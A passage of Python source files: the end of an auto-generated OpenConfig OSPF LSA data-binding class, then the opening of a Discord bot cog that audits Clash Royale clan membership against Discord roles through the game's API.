is_config=False)""", } ) self.__metric = t if hasattr(self, "_set"): self._set() def _unset_metric(self): self.__metric = YANGDynClass( base=RestrictedClassType( base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16 ), is_leaf=True, yang_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="oc-ospf-types:ospf-metric", is_config=False, ) forwarding_address = __builtin__.property(_get_forwarding_address) external_route_tag = __builtin__.property(_get_external_route_tag) tos = __builtin__.property(_get_tos) metric = __builtin__.property(_get_metric) _pyangbind_elements = OrderedDict( [ ("forwarding_address", forwarding_address), ("external_route_tag", external_route_tag), ("tos", tos), ("metric", metric), ] ) class state(PybindBase): """ This class was auto-generated by the PythonClass plugin for PYANG from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa-types/lsa-type/lsas/lsa/as-external-lsa/types-of-service/type-of-service/state. Each member element of the container is represented as a class variable - with a specific YANG type. YANG Description: Per-TOS parameters for the LSA """ __slots__ = ( "_path_helper", "_extmethods", "__forwarding_address", "__external_route_tag", "__tos", "__metric", ) _yang_name = "state" _pybind_generated_by = "container" def __init__(self, *args, **kwargs): self._path_helper = False self._extmethods = False self.__forwarding_address = YANGDynClass( base=RestrictedClassType( base_type=RestrictedClassType( base_type=six.text_type, restriction_dict={ "pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?" }, ), restriction_dict={"pattern": "[0-9\\.]*"}, ), is_leaf=True, yang_name="forwarding-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="inet:ipv4-address-no-zone", is_config=False, ) self.__external_route_tag = YANGDynClass( base=RestrictedClassType( base_type=long, restriction_dict={"range": ["0..4294967295"]}, int_size=32, ), is_leaf=True, yang_name="external-route-tag", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="uint32", is_config=False, ) self.__tos = YANGDynClass( base=RestrictedClassType( base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8 ), is_leaf=True, yang_name="tos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="uint8", is_config=False, ) self.__metric = YANGDynClass( base=RestrictedClassType( base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16 ), is_leaf=True, yang_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="oc-ospf-types:ospf-metric", is_config=False, ) load = kwargs.pop("load", None) if args: if len(args) > 1: raise TypeError("cannot create a YANG container with >1 argument") all_attr = True for e in self._pyangbind_elements: if not hasattr(args[0], e): all_attr = False break if not all_attr: raise ValueError("Supplied object did not have the correct attributes") for e in self._pyangbind_elements: nobj = getattr(args[0], e) if nobj._changed() is False: continue setmethod = getattr(self, "_set_%s" % e) if load is None: setmethod(getattr(args[0], e)) else: setmethod(getattr(args[0], e), load=load) def _path(self): if hasattr(self, "_parent"): return self._parent._path() + [self._yang_name] else: return [ "network-instances", "network-instance", "protocols", "protocol", "ospfv2", "areas", "area", "lsdb", "lsa-types", "lsa-type", "lsas", "lsa", "as-external-lsa", "types-of-service", "type-of-service", "state", ] def _get_forwarding_address(self): """ Getter method for forwarding_address, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service/type_of_service/state/forwarding_address (inet:ipv4-address-no-zone) YANG Description: The destination to which traffic for the external prefix should be advertised. When this value is set to 0.0.0.0 then traffic should be forwarded to the LSA's originator """ return self.__forwarding_address def _set_forwarding_address(self, v, load=False): """ Setter method for forwarding_address, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service/type_of_service/state/forwarding_address (inet:ipv4-address-no-zone) If this variable is read-only (config: false) in the source YANG file, then _set_forwarding_address is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_forwarding_address() directly. YANG Description: The destination to which traffic for the external prefix should be advertised. When this value is set to 0.0.0.0 then traffic should be forwarded to the LSA's originator """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass( v, base=RestrictedClassType( base_type=RestrictedClassType( base_type=six.text_type, restriction_dict={ "pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?" }, ), restriction_dict={"pattern": "[0-9\\.]*"}, ), is_leaf=True, yang_name="forwarding-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="inet:ipv4-address-no-zone", is_config=False, ) except (TypeError, ValueError): raise ValueError( { "error-string": """forwarding_address must be of a type compatible with inet:ipv4-address-no-zone""", "defined-type": "inet:ipv4-address-no-zone", "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="forwarding-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)""", } ) self.__forwarding_address = t if hasattr(self, "_set"): self._set() def _unset_forwarding_address(self): self.__forwarding_address = YANGDynClass( base=RestrictedClassType( base_type=RestrictedClassType( base_type=six.text_type, restriction_dict={ "pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?" }, ), restriction_dict={"pattern": "[0-9\\.]*"}, ), is_leaf=True, yang_name="forwarding-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="inet:ipv4-address-no-zone", is_config=False, ) def _get_external_route_tag(self): """ Getter method for external_route_tag, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service/type_of_service/state/external_route_tag (uint32) YANG Description: An opaque tag that set by the LSA originator to carry information relating to the external route """ return self.__external_route_tag def _set_external_route_tag(self, v, load=False): """ Setter method for external_route_tag, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service/type_of_service/state/external_route_tag (uint32) If this variable is read-only (config: false) in the source YANG file, then _set_external_route_tag is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_external_route_tag() directly. YANG Description: An opaque tag that set by the LSA originator to carry information relating to the external route """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass( v, base=RestrictedClassType( base_type=long, restriction_dict={"range": ["0..4294967295"]}, int_size=32, ), is_leaf=True, yang_name="external-route-tag", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="uint32", is_config=False, ) except (TypeError, ValueError): raise ValueError( { "error-string": """external_route_tag must be of a type compatible with uint32""", "defined-type": "uint32", "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="external-route-tag", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=False)""", } ) self.__external_route_tag = t if hasattr(self, "_set"): self._set() def _unset_external_route_tag(self): self.__external_route_tag = YANGDynClass( base=RestrictedClassType( base_type=long, restriction_dict={"range": ["0..4294967295"]}, int_size=32, ), is_leaf=True, yang_name="external-route-tag", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="uint32", is_config=False, ) def _get_tos(self): """ Getter method for tos, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service/type_of_service/state/tos (uint8) YANG Description: OSPF encoding of the type of service referred to by this LSA. Encoding for OSPF TOS are described in RFC2328. """ return self.__tos def _set_tos(self, v, load=False): """ Setter method for tos, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service/type_of_service/state/tos (uint8) If this variable is read-only (config: false) in the source YANG file, then _set_tos is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_tos() directly. YANG Description: OSPF encoding of the type of service referred to by this LSA. Encoding for OSPF TOS are described in RFC2328. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass( v, base=RestrictedClassType( base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8 ), is_leaf=True, yang_name="tos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="uint8", is_config=False, ) except (TypeError, ValueError): raise ValueError( { "error-string": """tos must be of a type compatible with uint8""", "defined-type": "uint8", "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="tos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=False)""", } ) self.__tos = t if hasattr(self, "_set"): self._set() def _unset_tos(self): self.__tos = YANGDynClass( base=RestrictedClassType( base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8 ), is_leaf=True, yang_name="tos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="uint8", is_config=False, ) def _get_metric(self): """ Getter method for metric, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service/type_of_service/state/metric (oc-ospf-types:ospf-metric) YANG Description: The metric value to be used for the TOS specified. This value represents the cost of use of the link for the specific type of service. """ return self.__metric def _set_metric(self, v, load=False): """ Setter method for metric, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service/type_of_service/state/metric (oc-ospf-types:ospf-metric) If this variable is read-only (config: false) in the source YANG file, then _set_metric is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_metric() directly. YANG Description: The metric value to be used for the TOS specified. This value represents the cost of use of the link for the specific type of service. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass( v, base=RestrictedClassType( base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16 ), is_leaf=True, yang_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="oc-ospf-types:ospf-metric", is_config=False, ) except (TypeError, ValueError): raise ValueError( { "error-string": """metric must be of a type compatible with oc-ospf-types:ospf-metric""", "defined-type": "oc-ospf-types:ospf-metric", "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-ospf-types:ospf-metric', is_config=False)""", } ) self.__metric = t if hasattr(self, "_set"): self._set() def _unset_metric(self): self.__metric = YANGDynClass( base=RestrictedClassType( base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16 ), is_leaf=True, yang_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="oc-ospf-types:ospf-metric", is_config=False, ) forwarding_address = __builtin__.property(_get_forwarding_address) external_route_tag = __builtin__.property(_get_external_route_tag) tos = __builtin__.property(_get_tos) metric = __builtin__.property(_get_metric) _pyangbind_elements = OrderedDict( [ ("forwarding_address", forwarding_address), ("external_route_tag", external_route_tag), ("tos", tos), ("metric", metric), ] )
fc77fc4b71fbf255ed35ce57035c54569e418768
9617203960dccb356b775c69d901ad815b9282bb
/racf_audit/racf_audit.py
a33f5d2417d86bffc64a7f1a41158eb9d84e8230
[ "MIT" ]
permissive
smlbiobot/SML-Cogs
5b97e7df0b1126a6daf22829f82adb84c3e35ee0
31e8553183b87dce76fdf7744fc9fb1434ccc67f
refs/heads/master
2021-10-27T13:02:38.591310
2021-10-26T15:56:17
2021-10-26T15:56:17
80,660,432
17
18
MIT
2018-06-15T00:05:54
2017-02-01T20:23:30
Python
UTF-8
Python
false
false
64,137
py
# -*- coding: utf-8 -*- """ The MIT License (MIT) Copyright (c) 2017 SML Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import argparse import asyncio import csv import datetime as dt import io import itertools import json import os import re from collections import OrderedDict from collections import defaultdict from collections import namedtuple import aiohttp import discord import humanfriendly import unidecode import yaml from addict import Dict from cogs.utils import checks from cogs.utils.chat_formatting import box from cogs.utils.chat_formatting import inline from cogs.utils.chat_formatting import pagify from cogs.utils.chat_formatting import underline from cogs.utils.dataIO import dataIO from discord.ext import commands from tabulate import tabulate PATH = os.path.join("data", "racf_audit") JSON = os.path.join(PATH, "settings.json") PLAYERS = os.path.join("data", "racf_audit", "player_db.json") # RACF_SERVER_ID = '218534373169954816' RACF_SERVER_ID = '528327242875535372' SML_SERVER_ID = '275395656955330560' MEMBER_ROLE_NAMES = [ 'Member', 'Tourney', 'Practice', 'CW', 'Diary', 'Alpha', 'Bravo', 'Coca', 'Delta', 'Echo', 'Fox', 'Golf', 'Hotel', 'Ice', 'One', 'Trade', 'Zen', 'Mini', 'OG', ] class NoPlayerRecord(Exception): pass def nested_dict(): """Recursively nested defaultdict.""" return defaultdict(nested_dict) def server_role(server, role_name): """Return discord role object by name.""" return discord.utils.get(server.roles, name=role_name) def member_has_role(server, member, role_name): """Return True if member has specific role.""" role = discord.utils.get(server.roles, name=role_name) return role in member.roles def grouper(n, iterable, fillvalue=None): """Group lists into lists of items. grouper(3, 'ABCDEFG', 'x') --> ABC DEF Gxx""" args = [iter(iterable)] * n return itertools.zip_longest(*args, fillvalue=fillvalue) async def check_manage_roles(ctx, bot): """Check for permissions to run command since no one has manage roles anymore.""" server = ctx.message.server author = ctx.message.author channel = ctx.message.channel # For 100T server, only allow command to run if user has the "Bot Comamnder" role if server.id == RACF_SERVER_ID: bc_role = discord.utils.get(server.roles, name="Bot Commander") if bc_role not in author.roles: await bot.send_message( channel, "Only Bot Commanders on this server can run this command.") return False else: return True # For other servers, only allow to run if user has manage role permissions if not author.server_permissions.manage_roles: await bot.send_message( channel, "You don’t have the manage roles permission.") return False return True class RACFAuditException(Exception): pass class CachedClanModels(RACFAuditException): pass AuditResult = namedtuple("AuditResult", "audit_results output error") class RACFClan: """RACF Clan.""" def __init__(self, name=None, tag=None, role=None, membership_type=None, model=None): """Init.""" self.name = name self.tag = tag self.role = role self.membership_type = membership_type self.model = model @property def repr(self): """Representation of the clan. Used for debugging.""" o = [] o.append('RACFClan object') o.append( "{0.name} #{0.tag} | {0.role.name}".format(self) ) members = sorted(self.model.members, key=lambda m: m.name.lower()) member_names = [m.name for m in members] print(member_names) o.append(', '.join(member_names)) return '\n'.join(o) class DiscordUser: """Discord user = player tag association.""" def __init__(self, user=None, tag=None): """Init.""" self.user = user self.tag = tag class DiscordUsers: """List of Discord users.""" def __init__(self, crclan_cog, server): """Init.""" self.crclan_cog = crclan_cog self.server = server self._user_list = None @property def user_list(self): """Create multiple DiscordUser from a list of tags. players format: '99688854348369920': '22Q0VGUP' discord_member_id: CR player tag """ if self._user_list is None: players = self.crclan_cog.manager.get_players(self.server) out = [] for member_id, player_tag in players.items(): user = self.server.get_member(member_id) if user is not None: out.append(DiscordUser(user=user, tag=player_tag)) self._user_list = out return self._user_list def tag_to_member(self, tag): """Return Discord member from tag.""" for u in self.user_list: if u.tag == tag: return u.user return None def tag_to_member_id(self, tag): """Return Discord member from tag.""" for u in self.user_list: if u.tag == tag: return u.user return None def clean_tag(tag): """clean up tag.""" if not tag: return tag t = tag.upper() t = t.replace('B', '8').replace('O', '0') t = re.sub(r'[^0289CGJLPQRUVY]+', '', t) return t def get_role_name(role): if role is None: return '' role = role.lower() roles_dict = { 'leader': 'Leader', 'coleader': 'Co-Leader', 'elder': 'Elder', 'member': 'Member' } if role in roles_dict.keys(): return roles_dict.get(role) return '' class ClashRoyaleAPIError(Exception): def __init__(self, status=None, message=None): super().__init__() self._status = status self._message = message @property def status(self): return self._status @property def message(self): return self._message @property def status_message(self): out = [] if self._status is not None: out.append(str(self._status)) if self._message is not None: out.append(self._message) return '. '.join(out) class ClashRoyaleAPI: def __init__(self, token): self.token = token async def fetch_with_session(self, session, url, timeout=30.0): """Perform the actual fetch with the session object.""" headers = { 'Authorization': 'Bearer {}'.format(self.token) } async with session.get(url, headers=headers) as resp: body = await resp.json() if resp.status != 200: raise ClashRoyaleAPIError(status=resp.status, message=resp.reason) return body async def fetch(self, url): """Fetch request.""" error_msg = None try: async with aiohttp.ClientSession() as session: body = await self.fetch_with_session(session, url) except asyncio.TimeoutError: error_msg = 'Request timed out' raise ClashRoyaleAPIError(message=error_msg) except aiohttp.ServerDisconnectedError as err: error_msg = 'Server disconnected error: {}'.format(err) raise ClashRoyaleAPIError(message=error_msg) except (aiohttp.ClientError, ValueError) as err: error_msg = 'Request connection error: {}'.format(err) raise ClashRoyaleAPIError(message=error_msg) except json.JSONDecodeError: error_msg = "Non JSON returned" raise ClashRoyaleAPIError(message=error_msg) else: return body finally: if error_msg is not None: raise ClashRoyaleAPIError(message=error_msg) async def fetch_multi(self, urls): """Perform parallel fetch""" results = [] error_msg = None try: async with aiohttp.ClientSession() as session: for url in urls: await asyncio.sleep(0) body = await self.fetch_with_session(session, url) results.append(body) except asyncio.TimeoutError: error_msg = 'Request timed out' raise ClashRoyaleAPIError(message=error_msg) except aiohttp.ServerDisconnectedError as err: error_msg = 'Server disconnected error: {}'.format(err) raise ClashRoyaleAPIError(message=error_msg) except (aiohttp.ClientError, ValueError) as err: error_msg = 'Request connection error: {}'.format(err) raise ClashRoyaleAPIError(message=error_msg) except json.JSONDecodeError: error_msg = "Non JSON returned" raise ClashRoyaleAPIError(message=error_msg) else: return results finally: if error_msg is not None: raise ClashRoyaleAPIError(message=error_msg) async def fetch_clan(self, tag): """Get a clan.""" tag = clean_tag(tag) url = 'https://api.clashroyale.com/v1/clans/%23{}'.format(tag) body = await self.fetch(url) return body async def fetch_clan_list(self, tags): """Get multiple clans.""" tags = [clean_tag(tag) for tag in tags] tasks = [self.fetch_clan(tag) for tag in tags] results = await asyncio.gather(*tasks, return_exceptions=True) for index, r in enumerate(results): if isinstance(r, ClashRoyaleAPIError): print(r.status_message) results[index] = {} raise ClashRoyaleAPIError(status=r.status, message=r.message) return results async def fetch_clan_leaderboard(self, location=None): """Get clan leaderboard""" url = 'https://api.clashroyale.com/v1/locations/global/rankings/clans' body = await self.fetch(url) return body async def fetch_clan_war(self, tag=None): url = 'https://api.clashroyale.com/v1/clans/%23{}/currentwar'.format(tag) body = await self.fetch(url) return body class RACFAudit: """RACF Audit. Requires use of additional cogs for functionality: SML-Cogs: crclan : CRClan SML-Cogs: mm : MemberManagement """ required_cogs = ['crclan', 'mm'] def __init__(self, bot): """Init.""" self.bot = bot self.settings = dataIO.load_json(JSON) self._clan_roles = None players_path = PLAYERS if not os.path.exists(players_path): players_path = os.path.join(PATH, "player_db_bak.json") self._players = dataIO.load_json(players_path) dataIO.save_json(PLAYERS, self._players) with open('data/racf_audit/family_config.yaml') as f: self.config = yaml.load(f, Loader=yaml.FullLoader) loop = asyncio.get_event_loop() self.task = loop.create_task(self.loop_task()) def __unload(self): """Remove task when unloaded.""" try: if self.task: self.task.cancel() except Exception: pass async def loop_task(self): """Loop.""" try: while True: if self == self.bot.get_cog("RACFAudit"): loop = asyncio.get_event_loop() loop.create_task(self.run_audit_task()) interval = int(dt.timedelta(hours=4).total_seconds()) await asyncio.sleep(interval) except asyncio.CancelledError: pass @property def players(self): """Player dictionary, userid -> tag""" return self._players # players = dataIO.load_json(PLAYERS) # return players @commands.group(aliases=["racfas"], pass_context=True, no_pm=True) # @checks.mod_or_permissions(manage_roles=True) async def racfauditset(self, ctx): """RACF Audit Settings.""" verified = await check_manage_roles(ctx, self.bot) if not verified: return if ctx.invoked_subcommand is None: await self.bot.send_cmd_help(ctx) async def update_server_settings(self, ctx, key, value): """Set server settings.""" server = ctx.message.server self.settings[server.id][key] = value dataIO.save_json(JSON, self.settings) await self.bot.say("Updated settings.") async def set_player_tag(self, tag, member: discord.Member, force=False): """Allow external programs to set player tags. (RACF)""" await asyncio.sleep(0) players = self.players # clean tags tag = clean_tag(tag) # ensure unique tag tag_in_db = False if tag in players.keys(): tag_in_db = True if not force: return False # ensure unique user ids user_id_in_db = False for k, v in players.items(): if v.get('user_id') == member.id: user_id_in_db = True if not force: return False # if force override, remove the entries if tag_in_db: players.pop(tag, None) if user_id_in_db: _ks = None for k, v in players.items(): if v.get('user_id') == member.id: if _ks is None: _ks = [] _ks.append(k) if _ks is not None: for k in _ks: players.pop(k, None) players[tag] = { "tag": tag, "user_id": member.id, "user_name": member.display_name } dataIO.save_json(PLAYERS, players) return True async def get_player_tag(self, tag): await asyncio.sleep(0) return self.players.get(tag) async def rm_player_tag(self, tag): """Remove player tag from settings.""" pass @racfauditset.command(name="auth", pass_context=True) @checks.is_owner() async def racfauditset_auth(self, ctx, token): """Set API Authentication token.""" self.settings["auth"] = token dataIO.save_json(JSON, self.settings) await self.bot.say("Updated settings.") await self.bot.delete_message(ctx.message) @racfauditset.command(name="settings", pass_context=True) @checks.is_owner() async def racfauditset_settings(self, ctx): """Set API Authentication token.""" await self.bot.say(box(self.settings)) @property def auth(self): """API authentication token.""" return self.settings.get("auth") @commands.group(aliases=["racfa"], pass_context=True, no_pm=True) async def racfaudit(self, ctx): """RACF Audit.""" if ctx.invoked_subcommand is None: await self.bot.send_cmd_help(ctx) @racfaudit.command(name="config", pass_context=True, no_pm=True) @checks.mod_or_permissions() async def racfaudit_config(self, ctx): """Show config.""" for page in pagify(box(tabulate(self.config['clans'], headers="keys"))): await self.bot.say(page) def clan_tags(self): tags = [] for clan in self.config.get('clans'): # only clans with member roles if clan.get('type') == 'Member': tags.append(clan.get('tag')) return tags @property def clan_roles(self): """Dictionary mapping clan name to clan role names""" if self._clan_roles is None: self._clan_roles = {} for clan in self.config.get('clans'): if clan['type'] == 'Member': self._clan_roles[clan['name']] = clan['role_name'] return self._clan_roles def search_args_parser(self): """Search arguments parser.""" # Process arguments parser = argparse.ArgumentParser(prog='[p]racfaudit search') parser.add_argument( 'name', nargs='?', default='_', help='IGN') parser.add_argument( '-c', '--clan', nargs='?', help='Clan') parser.add_argument( '-n', '--min', nargs='?', type=int, default=0, help='Min Trophies') parser.add_argument( '-m', '--max', nargs='?', type=int, default=10000, help='Max Trophies') parser.add_argument( '-l', '--link', action='store_true', default=False ) return parser @property def api(self): return ClashRoyaleAPI(self.auth) async def family_member_models(self): """All family member models.""" api = ClashRoyaleAPI(self.auth) tags = self.clan_tags() clan_models = await api.fetch_clan_list(tags) # print(clan_models) members = [] for clan_model in clan_models: for member_model in clan_model.get('memberList', []): tag = member_model.get('tag') if tag: member_model['tag'] = clean_tag(tag) member_model['clan'] = clan_model members.append(member_model) return members @racfaudit.command(name="tag2member", pass_context=True, aliases=['t2m']) async def racfaudit_tag2member(self, ctx, tag): """Find member by tag in DB.""" verified = await check_manage_roles(ctx, self.bot) if not verified: return tag = clean_tag(tag) user_id = None for _key, m in self.players.items(): m_tag = m.get('tag') if m_tag is not None and m_tag == tag: user_id = m['user_id'] break if user_id is None: await self.bot.say("Member not found.") else: server = ctx.message.server member = server.get_member(user_id) await self.bot.say("{} ({}) is associated with #{}".format( member.mention if member is not None else 'Unknown user', user_id, tag) ) @racfaudit.command(name="tag", pass_context=True) # @checks.mod_or_permissions(manage_roles=True) async def racfaudit_tag(self, ctx, member: discord.Member): """Find member tag in DB.""" verified = await check_manage_roles(ctx, self.bot) if not verified: return found = False for tag, m in self.players.items(): if m["user_id"] == member.id: await self.bot.say("RACF Audit database: `{}` is associated to `#{}`".format(member, tag)) found = True if not found: await self.bot.say("RACF Audit database: Member is not associated with any tags.") @racfaudit.command(name="rmtag", pass_context=True) # @checks.mod_or_permissions(manage_roles=True) async def racfaudit_rm_tag(self, ctx, tag): """Remove tag in DB.""" verified = await check_manage_roles(ctx, self.bot) if not verified: return tag = clean_tag(tag) try: self.players.pop(tag, None) except KeyError: await self.bot.say("Tag not found in DB.") else: dataIO.save_json(PLAYERS, self.players) await self.bot.say("Removed tag from DB.") @racfaudit.command(name="search", pass_context=True, no_pm=True) # @checks.mod_or_permissions(manage_roles=True) async def racfaudit_search(self, ctx, *args): """Search for member. usage: [p]racfaudit search [-h] [-t TAG] name positional arguments: name IGN optional arguments: -h, --help show this help message and exit -c CLAN, --clan CLAN Clan name -n MIN --min MIN Min Trophies -m MAX --max MAX Max Trophies -l --link Display link to cr-api.com """ verified = await check_manage_roles(ctx, self.bot) if not verified: return parser = self.search_args_parser() try: pargs = parser.parse_args(args) except SystemExit: await self.bot.send_cmd_help(ctx) return results = [] await self.bot.type() try: member_models = await self.family_member_models() except ClashRoyaleAPIError as e: await self.bot.say(e.status_message) return if pargs.name != '_': for member_model in member_models: # simple search if pargs.name.lower() in member_model.get('name').lower(): results.append(member_model) else: # unidecode search s = unidecode.unidecode(member_model.get('name')) s = ''.join(re.findall(r'\w', s)) if pargs.name.lower() in s.lower(): results.append(member_model) else: results = member_models # filter by clan name if pargs.clan: results = [m for m in results if pargs.clan.lower() in m.get('clan', {}).get('name', '').lower()] # filter by trophies results = [m for m in results if pargs.min <= m.get('trophies') <= pargs.max] limit = 10 if len(results) > limit: await self.bot.say( "Found more than {0} results. Returning top {0} only.".format(limit) ) results = results[:limit] if len(results): out = [] for member_model in results: clan = member_model.get('clan') clan_name = None if clan is not None: clan_name = clan.get('name') out.append("**{name}** #{tag}, {clan_name}, {role}, {trophies}".format( name=member_model.get('name'), tag=member_model.get('tag'), clan_name=clan_name, role=get_role_name(member_model.get('role')), trophies=member_model.get('trophies'), )) if pargs.link: out.append('<http://royaleapi.com/player/{}>'.format(member_model.get('tag'))) out.append('<http://royaleapi.com/player/{}/battles>'.format(member_model.get('tag'))) for page in pagify('\n'.join(out)): await self.bot.say(page) else: await self.bot.say("No results found.") def run_args_parser(self): """Search arguments parser.""" # Process arguments parser = argparse.ArgumentParser(prog='[p]racfaudit run') parser.add_argument( '-x', '--exec', action='store_true', default=False, help='Execute add/remove roles') parser.add_argument( '-d', '--debug', action='store_true', default=False, help='Debug') parser.add_argument( '-c', '--clan', nargs='+', help='Clan(s) to show') parser.add_argument( '-s', '--settings', action='store_true', default=False, help='Settings') return parser @racfaudit.command(name="run", pass_context=True, no_pm=True) # @checks.mod_or_permissions(manage_roles=True) async def racfaudit_run(self, ctx, *args): """Audit the entire RACF family. [p]racfaudit run [-h] [-x] [-d] [-c CLAN [CLAN ...]] optional arguments: -h, --help show this help message and exit -x, --exec Execute add/remove roles -d, --debug Debug -c CLAN [CLAN ...], --clan CLAN [CLAN ...] Clan(s) to show """ verified = await check_manage_roles(ctx, self.bot) if not verified: return server = ctx.message.server parser = self.run_args_parser() try: pargs = parser.parse_args(args) except SystemExit: await self.bot.send_cmd_help(ctx) return # Show settings if pargs.settings: await 